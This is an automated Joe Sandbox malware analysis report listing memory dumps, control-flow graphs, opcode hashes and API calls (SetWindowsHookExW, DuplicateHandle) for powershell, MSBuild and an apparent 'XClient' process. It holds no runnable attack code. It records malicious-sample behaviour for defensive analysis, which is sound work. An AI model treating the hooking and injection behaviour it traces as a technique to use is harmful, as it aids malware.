                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1682177107.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4aed0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d1ed1d37a8e1260010d5590a27081e28cf612b8eb3d1bb0c45b32663d2da7cd7
                                                                                                      • Instruction ID: 746dc9579bb0c945605d7fbe51e9d61fd19f814dca35a9614330e082d3798666
                                                                                                      • Opcode Fuzzy Hash: d1ed1d37a8e1260010d5590a27081e28cf612b8eb3d1bb0c45b32663d2da7cd7
                                                                                                      • Instruction Fuzzy Hash: D84195B2A0CB994FEB55AF1CE4421A87BE0FF45320F2401EBE44EC3582D625A845C7C1

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1682177107.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4aed0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a543d5ec2c4340aed4ced522a7df3ff00e1b85847dd561e031c15960f2c43409
                                                                                                      • Instruction ID: ac388a2595e15dd03af77d81b9917080453cb7d942ef71cdaa716c11a55bb3f3
                                                                                                      • Opcode Fuzzy Hash: a543d5ec2c4340aed4ced522a7df3ff00e1b85847dd561e031c15960f2c43409
                                                                                                      • Instruction Fuzzy Hash: 7541E4D294EA870FF7EABE7889622785AC6BF95250B7800F9D4ADC71D3DC1C98464242

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 282 7ffb4aed6617-7ffb4aed66d5 295 7ffb4aed66dd-7ffb4aed66f5 282->295
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1682177107.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4aed0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 068702d50d85a365da37703768c9a83c79cb6126349e8d896f96b025cb3381c5
                                                                                                      • Instruction ID: 701da6a6d97d2c443efd723295b37138ee9b568a9c11e8b652435169102a1442
                                                                                                      • Opcode Fuzzy Hash: 068702d50d85a365da37703768c9a83c79cb6126349e8d896f96b025cb3381c5
                                                                                                      • Instruction Fuzzy Hash: 0731B8E394E7C68FE355BEBC89590642FD4EF56651B3900FED0ACCB193E8191C498391

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:8.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:14
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 15343 2d965c8 15345 2d9660c SetWindowsHookExW 15343->15345 15346 2d96652 15345->15346 15347 2d9b880 15348 2d9b8c6 15347->15348 15352 2d9ba51 15348->15352 15356 2d9ba60 15348->15356 15349 2d9b9b3 15353 2d9ba60 15352->15353 15359 2d9b54c 15353->15359 15357 2d9b54c DuplicateHandle 15356->15357 15358 2d9ba8e 15357->15358 15358->15349 15360 2d9bac8 DuplicateHandle 15359->15360 15361 2d9ba8e 15360->15361 15361->15349
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ]
                                                                                                      • API String ID: 0-3352871620
                                                                                                      • Opcode ID: 8ecb1c3de17eaa8934f0f84646bec7b77f52877693b4808ee206547f5d6a2c19
                                                                                                      • Instruction ID: a73423775ce50dbec7fea8e16d2f1480b1c83cb2bad4ef1146904c748c017ee2
                                                                                                      • Opcode Fuzzy Hash: 8ecb1c3de17eaa8934f0f84646bec7b77f52877693b4808ee206547f5d6a2c19
                                                                                                      • Instruction Fuzzy Hash: AE22AC34B002199FDF18DF65D894BAE7BAABFC8704F548068F5069B395DB349C42CBA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 296 2d94ea8-2d94ee6 297 2d94ee8-2d94eef 296->297 298 2d94f0b-2d94f28 call 2d941a0 296->298 299 2d957a5-2d957b0 297->299 300 2d94ef5-2d94f00 call 2d90168 297->300 306 2d94f2a-2d94f30 298->306 307 2d94f33-2d94f44 298->307 309 2d957b7-2d9582b 299->309 300->298 306->307 310 2d94f4a-2d94f5a call 2d94200 307->310 311 2d94ff2-2d95015 307->311 362 2d95832-2d9589e 309->362 319 2d94f5c-2d94f75 310->319 320 2d94fb7-2d94fba 310->320 317 2d9501b-2d95028 311->317 318 2d95262-2d9528f 311->318 317->318 327 2d9502e-2d95034 317->327 328 2d95375-2d9539b call 2d942a0 318->328 329 2d95295-2d952a3 318->329 330 2d94f7b-2d94f80 319->330 331 2d958a5-2d958c8 319->331 321 2d94fc8-2d94fda 320->321 322 2d94fbc-2d94fc3 320->322 321->331 338 2d94fe0-2d94fed 321->338 322->318 335 2d9503a-2d95046 327->335 336 2d95036-2d95038 327->336 340 2d953a0 328->340 329->328 347 2d952a9-2d952b6 329->347 330->318 337 2d94f86-2d94fb2 330->337 343 2d958ca-2d958cf 331->343 344 2d958d1-2d958df 331->344 341 2d95048-2d95057 335->341 336->341 337->318 338->318 346 2d95796-2d9579d 340->346 341->309 356 2d9505d-2d95061 341->356 351 2d95943-2d95945 343->351 358 2d958e1-2d958f1 344->358 359 2d95937-2d9593c 344->359 360 2d952bc-2d952bf 347->360 361 2d957a0 347->361 356->362 363 2d95067-2d9506e 356->363 358->359 366 2d958f3-2d95903 358->366 359->351 360->361 368 2d952c5-2d952e2 360->368 361->299 362->331 363->362 364 2d95074-2d9507b 363->364 369 2d95081-2d95088 364->369 370 2d95170-2d95177 364->370 366->359 372 2d95905-2d95915 366->372 384 2d95325-2d9534f 368->384 385 2d952e4-2d952ea 368->385 369->331 374 2d9508e-2d950a9 369->374 370->318 373 2d9517d-2d951a1 370->373 372->359 376 2d95917-2d95925 372->376 386 2d951da-2d951ee 373->386 387 2d951a3-2d951a9 373->387 388 2d950ab-2d950ad 374->388 389 2d950af-2d950c9 374->389 376->359 391 2d95927-2d9592d 376->391 384->346 426 2d95355-2d95361 384->426 385->331 394 2d952f0-2d952f6 385->394 408 2d951f0 386->408 409 2d951f2-2d951fe 386->409 395 2d951ab-2d951ad 387->395 396 2d951af-2d951bb 387->396 397 2d950cb-2d950d9 388->397 389->397 392 2d9592f 391->392 393 2d95931 391->393 399 2d95933-2d95935 392->399 393->399 400 2d95309-2d95311 call 2d90168 394->400 401 2d952f8-2d952fb 394->401 402 2d951bd-2d951c6 395->402 396->402 406 2d950db-2d950ea 397->406 407 2d950fe-2d9512e 397->407 399->359 410 2d9593e 399->410 416 2d95318-2d9531b 400->416 401->331 411 2d95301-2d95307 401->411 402->386 425 2d951c8-2d951d8 402->425 406->407 427 2d950ec-2d950fc 406->427 414 2d95200-2d95212 408->414 409->414 410->351 411->416 432 2d9524c-2d9525f 414->432 416->361 424 2d95321-2d95323 416->424 424->384 424->385 425->386 439 2d95214-2d9524a 425->439 426->328 435 2d95363 426->435 427->407 436 2d95131-2d9516d 427->436 432->318 435->346 439->432
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ]
                                                                                                      • API String ID: 0-3352871620
                                                                                                      • Opcode ID: 407d0fb0787b1a7ab96b1328c6726a7ec403d15fa9633a7b50da4cb2bb0608ab
                                                                                                      • Instruction ID: 44eccfc885e0c26193ffe468edcb2972125556e2ba4bbf424773cc44a51a2e76
                                                                                                      • Opcode Fuzzy Hash: 407d0fb0787b1a7ab96b1328c6726a7ec403d15fa9633a7b50da4cb2bb0608ab
                                                                                                      • Instruction Fuzzy Hash: 03027034B00219CFEF25DF24D884B6E77A6AF89314F5480A9E909AB395DB31DD81CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 632 2d91958-2d9197b 633 2d91981-2d91aaa 632->633 634 2d91ee5-2d91fe2 632->634 681 2d91aac 633->681 682 2d91ab3-2d91b12 call 2d923c0 call 2d90298 call 2d902a8 633->682 681->682 693 2d91b23-2d91b32 682->693 694 2d91b14-2d91b1c 682->694 697 2d91b54-2d91c65 call 2d902b8 call 2d902c8 693->697 698 2d91b34-2d91b4e call 2d90298 693->698 694->693 722 2d91c6b-2d91c8f call 2d92c79 697->722 723 2d91de0-2d91df3 697->723 698->697 726 2d91cdd-2d91d06 722->726 727 2d91c91-2d91c98 722->727 733 2d91df8-2d91e4d call 2d95ed3 call 2d92578 723->733 738 2d91d08-2d91d1b 726->738 739 2d91d1d-2d91d30 726->739 727->723 729 2d91c9e-2d91cb6 727->729 740 2d91cbe-2d91cc0 729->740 763 2d91e4f 733->763 764 2d91e55-2d91ed5 733->764 744 2d91d38-2d91d64 738->744 739->744 785 2d91d32 call 2d948b0 739->785 741 2d91cd8-2d91cdb 740->741 742 2d91cc2-2d91cc8 740->742 741->726 745 2d91cca 742->745 746 2d91ccc-2d91cce 742->746 754 2d91d7b-2d91d8e 744->754 755 2d91d66-2d91d79 744->755 745->741 746->741 756 2d91d96-2d91dde call 2d95950 call 2d902d8 754->756 755->756 756->733 763->764 779 2d91edd-2d91ee4 764->779 785->744
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 413a99d9e042054cfd95349c332106c0660a81083c4e2e36060d77da21ef3a16
                                                                                                      • Instruction ID: df4d24f6194b3fe159fea9e2ff13b46c11316fb544edcfe58b422b5c3eacb9b0
                                                                                                      • Opcode Fuzzy Hash: 413a99d9e042054cfd95349c332106c0660a81083c4e2e36060d77da21ef3a16
                                                                                                      • Instruction Fuzzy Hash: D3F19E347002158FDF19AB75D898B6E7BA7FBC8701F108569EA069B398EF719C01DB90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1160 2d9faf8-2d9fb5e 1162 2d9fba8-2d9fbaa 1160->1162 1163 2d9fb60-2d9fb6b 1160->1163 1164 2d9fbac-2d9fbc5 1162->1164 1163->1162 1165 2d9fb6d-2d9fb79 1163->1165 1172 2d9fc11-2d9fc13 1164->1172 1173 2d9fbc7-2d9fbd3 1164->1173 1166 2d9fb7b-2d9fb85 1165->1166 1167 2d9fb9c-2d9fba6 1165->1167 1168 2d9fb89-2d9fb98 1166->1168 1169 2d9fb87 1166->1169 1167->1164 1168->1168 1171 2d9fb9a 1168->1171 1169->1168 1171->1167 1174 2d9fc15-2d9fc6d 1172->1174 1173->1172 1175 2d9fbd5-2d9fbe1 1173->1175 1184 2d9fc6f-2d9fc7a 1174->1184 1185 2d9fcb7-2d9fcb9 1174->1185 1176 2d9fbe3-2d9fbed 1175->1176 1177 2d9fc04-2d9fc0f 1175->1177 1179 2d9fbef 1176->1179 1180 2d9fbf1-2d9fc00 1176->1180 1177->1174 1179->1180 1180->1180 1181 2d9fc02 1180->1181 1181->1177 1184->1185 1187 2d9fc7c-2d9fc88 1184->1187 1186 2d9fcbb-2d9fcd3 1185->1186 1193 2d9fd1d-2d9fd1f 1186->1193 1194 2d9fcd5-2d9fce0 1186->1194 1188 2d9fcab-2d9fcb5 1187->1188 1189 2d9fc8a-2d9fc94 1187->1189 1188->1186 1191 2d9fc98-2d9fca7 1189->1191 1192 2d9fc96 1189->1192 1191->1191 1195 2d9fca9 1191->1195 1192->1191 1197 2d9fd21-2d9fd86 1193->1197 1194->1193 1196 2d9fce2-2d9fcee 1194->1196 1195->1188 1198 2d9fd11-2d9fd1b 1196->1198 1199 2d9fcf0-2d9fcfa 1196->1199 1206 2d9fd88-2d9fd8e 1197->1206 1207 2d9fd8f-2d9fdaf 1197->1207 1198->1197 1200 2d9fcfc 1199->1200 1201 2d9fcfe-2d9fd0d 1199->1201 1200->1201 1201->1201 1203 2d9fd0f 1201->1203 1203->1198 1206->1207 1211 2d9fdb9-2d9fdef 1207->1211 1214 2d9fdff-2d9fe03 1211->1214 1215 2d9fdf1-2d9fdf5 1211->1215 1217 2d9fe13-2d9fe17 1214->1217 1218 2d9fe05-2d9fe09 1214->1218 1215->1214 1216 2d9fdf7 1215->1216 1216->1214 1220 2d9fe19-2d9fe1d 1217->1220 1221 2d9fe27-2d9fe2b 1217->1221 1218->1217 1219 2d9fe0b 1218->1219 1219->1217 1220->1221 1222 2d9fe1f-2d9fe22 call 2d92b3c 1220->1222 1223 2d9fe3b-2d9fe3f 1221->1223 1224 2d9fe2d-2d9fe31 1221->1224 1222->1221 1227 2d9fe4f-2d9fe53 1223->1227 1228 2d9fe41-2d9fe45 1223->1228 1224->1223 1226 2d9fe33-2d9fe36 call 2d92b3c 1224->1226 1226->1223 1230 2d9fe63-2d9fe67 1227->1230 1231 2d9fe55-2d9fe59 1227->1231 1228->1227 1229 2d9fe47-2d9fe4a call 2d92b3c 1228->1229 1229->1227 1235 2d9fe69-2d9fe6d 1230->1235 1236 2d9fe77 1230->1236 1231->1230 1234 2d9fe5b 1231->1234 1234->1230 1235->1236 1237 2d9fe6f 1235->1237 1237->1236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d29dec8cf85da42734221d7ad09bd3da43320d8088d4da04fbaaa821266b3200
                                                                                                      • Instruction ID: 3204235d3bc381dd5dddd4cd84448023c20113fea4cc043f8ba1d929629f03d6
                                                                                                      • Opcode Fuzzy Hash: d29dec8cf85da42734221d7ad09bd3da43320d8088d4da04fbaaa821266b3200
                                                                                                      • Instruction Fuzzy Hash: 16B13A70E002098FDF14CFA9D8857ADBBF2AF88718F148529E815E7794EB749845CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1349 2d91fe8-2d91ff5 1350 2d92032-2d92035 1349->1350 1351 2d91ff7-2d92005 1349->1351 1352 2d9203b-2d92049 1350->1352 1353 2d92294-2d922a2 1350->1353 1354 2d9200e-2d9201e 1351->1354 1355 2d92007-2d92009 1351->1355 1362 2d9204f 1352->1362 1363 2d922b5-2d9232e 1352->1363 1353->1363 1364 2d922a4-2d922a8 call 2d902f8 1353->1364 1357 2d92020 1354->1357 1358 2d92025-2d92031 1354->1358 1356 2d922ad-2d922b4 1355->1356 1357->1356 1358->1350 1362->1363 1365 2d92219-2d92245 1362->1365 1366 2d920ba-2d920db 1362->1366 1367 2d9217f-2d921a7 1362->1367 1368 2d92093-2d920b5 1362->1368 1369 2d92152-2d9217a 1362->1369 1370 2d92056-2d92068 1362->1370 1371 2d92288-2d92292 1362->1371 1372 2d9206d-2d9208e 1362->1372 1373 2d9212c-2d9214d 1362->1373 1374 2d921ac-2d921e9 1362->1374 1375 2d921ee-2d92214 1362->1375 1376 2d920e0-2d92101 1362->1376 1377 2d92264-2d92286 1362->1377 1378 2d92247-2d92262 call 2d901d0 1362->1378 1379 2d92106-2d92127 1362->1379 1364->1356 1365->1356 1366->1356 1367->1356 1368->1356 1369->1356 1370->1356 1371->1356 1372->1356 1373->1356 1374->1356 1375->1356 1376->1356 1377->1356 1378->1356 1379->1356
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1975f45562a97d91a0cc39b15b3ecc19e8662e435ffd016ed2853341c983dc22
                                                                                                      • Instruction ID: aeb70a2c84be0f18cf05f8c44abe922163111680591223d993ecdeec266beb0f
                                                                                                      • Opcode Fuzzy Hash: 1975f45562a97d91a0cc39b15b3ecc19e8662e435ffd016ed2853341c983dc22
                                                                                                      • Instruction Fuzzy Hash: F7918E74F00259AFDF1CABB5985866E7BB6BFC8700F05C569E846EB388CE349C018791

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 448 2d9b54c-2d9bb5c DuplicateHandle 450 2d9bb5e-2d9bb64 448->450 451 2d9bb65-2d9bb82 448->451 450->451
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9BA8E,?,?,?,?,?), ref: 02D9BB4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: f1b5067e0e8269116b7635df8e5227406f12c2af3f8b690394093f12d1aefd2d
                                                                                                      • Instruction ID: b8d85589f91a9d13621004282301699a1dd2f775eab007426b2242882c50834f
                                                                                                      • Opcode Fuzzy Hash: f1b5067e0e8269116b7635df8e5227406f12c2af3f8b690394093f12d1aefd2d
                                                                                                      • Instruction Fuzzy Hash: DE21E5B590030D9FDB10CF9AD484AEEBBF4FB48324F14801AE958A7350D379A950CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 454 2d9bac0-2d9bac2 455 2d9bac8-2d9bb5c DuplicateHandle 454->455 456 2d9bb5e-2d9bb64 455->456 457 2d9bb65-2d9bb82 455->457 456->457
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9BA8E,?,?,?,?,?), ref: 02D9BB4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 2a1f6fc3b5f88f89dd839d2d70a42aebdca3857b73cfe7f0d276b3c02cc8e4cc
                                                                                                      • Instruction ID: a8c146f2c593d1d0bdbb0be56b01490df505918c4e4391c643e68f7d68d5c23e
                                                                                                      • Opcode Fuzzy Hash: 2a1f6fc3b5f88f89dd839d2d70a42aebdca3857b73cfe7f0d276b3c02cc8e4cc
                                                                                                      • Instruction Fuzzy Hash: 762116B590030D9FDB10CF9AD484ADEBBF8FB48314F14801AE914A3350D378A944CF61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 470 2d965c8-2d96612 472 2d9661e-2d96650 SetWindowsHookExW 470->472 473 2d96614 470->473 474 2d96659-2d9667e 472->474 475 2d96652-2d96658 472->475 476 2d9661c 473->476 475->474 476->472
                                                                                                      APIs
                                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02D96643
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: 073a34f485f5676b9b522b28212ff52a79b71fbdaf584e7f3a7ddb01a31e573c
                                                                                                      • Instruction ID: e2b98625b34f7ad5c8e4a96b4dfcf304eebc7d51251e638e52ba798ffcef9e50
                                                                                                      • Opcode Fuzzy Hash: 073a34f485f5676b9b522b28212ff52a79b71fbdaf584e7f3a7ddb01a31e573c
                                                                                                      • Instruction Fuzzy Hash: 942118759002498FDB14DF9AC844BDEBBF5EF88310F14841AE455A7350C775A944CFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 460 2d965c0-2d96612 462 2d9661e-2d96650 SetWindowsHookExW 460->462 463 2d96614 460->463 464 2d96659-2d9667e 462->464 465 2d96652-2d96658 462->465 466 2d9661c 463->466 465->464 466->462
                                                                                                      APIs
                                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02D96643
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2588895525.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_2d90000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2559412058-0
                                                                                                      • Opcode ID: 43c7f701720c1db15a9024ffad9b33fe5e667b984dce5c8909b2c9e226713273
                                                                                                      • Instruction ID: 9a5b4f19bc86568f3e485397a8037231ae29243bc84cbe4f348a7e22c0be6ebb
                                                                                                      • Opcode Fuzzy Hash: 43c7f701720c1db15a9024ffad9b33fe5e667b984dce5c8909b2c9e226713273
                                                                                                      • Instruction Fuzzy Hash: B42134B5D002498FDF14CFA9C944BEEBBF5BF88310F14842AE458A72A0C7749944CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587191293.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13ad000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de123f880c0647bac68912cd8bfe5bd2c01d67b892e347264313ee2e78de606b
                                                                                                      • Instruction ID: 1be2d0ab2179dc41e04472c3395baed1d794bb6056a39e18eb2d9df08cf30899
                                                                                                      • Opcode Fuzzy Hash: de123f880c0647bac68912cd8bfe5bd2c01d67b892e347264313ee2e78de606b
                                                                                                      • Instruction Fuzzy Hash: 242145B1504304DFDB05DF54D8C4B26BF66FB8832CF64C169E8890BA56C336D406CBA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587905484.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13bd000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d068a0830fb16453390bef766faa7be78d3d0f544e667abafc4d0ab1f3ccb271
                                                                                                      • Instruction ID: 35a2c97299e5bf8e835e73c424d7b1de811a00edc8789757abc2cb6d266b6d2d
                                                                                                      • Opcode Fuzzy Hash: d068a0830fb16453390bef766faa7be78d3d0f544e667abafc4d0ab1f3ccb271
                                                                                                      • Instruction Fuzzy Hash: 352142B56043049FEB45DF54C8C0B22BBA5FB8822CF20C56DDA0A0BA82D33AC406CA61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587905484.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13bd000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7e75f32d7f0dcfbf8ae59ff3534a032e78273e8440c15104028f671de543197f
                                                                                                      • Instruction ID: da7883de1406e9ceb32a77c7bca4781ee4459f98a6dd8e8e3298e58b85cbb645
                                                                                                      • Opcode Fuzzy Hash: 7e75f32d7f0dcfbf8ae59ff3534a032e78273e8440c15104028f671de543197f
                                                                                                      • Instruction Fuzzy Hash: EB213471604304DFDB14DF64C9C4B16BB65FB8425CF20C56DDA094BB42D33AC847CA62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587905484.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13bd000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 404821ab6d92ff389978edc724073eee4d1af948d32a578407f5f7aa0d25e7ac
                                                                                                      • Instruction ID: 294c5fd78f92f00b53f5ccd2ced4f0023c6a84b73d8ae8bb9888a199dd75e22f
                                                                                                      • Opcode Fuzzy Hash: 404821ab6d92ff389978edc724073eee4d1af948d32a578407f5f7aa0d25e7ac
                                                                                                      • Instruction Fuzzy Hash: F021D1755083808FCB02CF24C9C0B11BF71EB46218F28C5EAD9498F6A3D33A9846CB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587191293.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13ad000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction ID: 6805ccf96d67fbfca554b2b8e1966aaefea42b9f5fdbc3afa6227aca0894c1c4
                                                                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction Fuzzy Hash: 8111D376504280CFCB16CF54D5C4B16BF72FB84328F24C6A9D8494B657C33AD55ACBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.2587905484.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_13bd000_MSBuild.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                      • Instruction ID: c2ba1029f547ab7adc9cad16cbb9dc55a805d0b0b7524dccc91b50b007d0b60b
                                                                                                      • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                      • Instruction Fuzzy Hash: 2511BB79504284CFDB06CF54D9C4B15BFA2FB84228F28C6A9D9494B696C33AD44ACB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.1790231445.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_1080000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9668e56700e12ee732aaac55000e88b3b924e7379b1eb45901b05a499ce29be0
                                                                                                      • Instruction ID: bfc3c36ccaeedebf81b374fbdd8d7593637929148327d0fc1768ee062d9ed99f
                                                                                                      • Opcode Fuzzy Hash: 9668e56700e12ee732aaac55000e88b3b924e7379b1eb45901b05a499ce29be0
                                                                                                      • Instruction Fuzzy Hash: DA038B31A0071A9FEB11EF64CC44BA9B7B6FFC9B00F518695E5096B291CBB06E81CF51
                                                                                                      Memory Dump Source
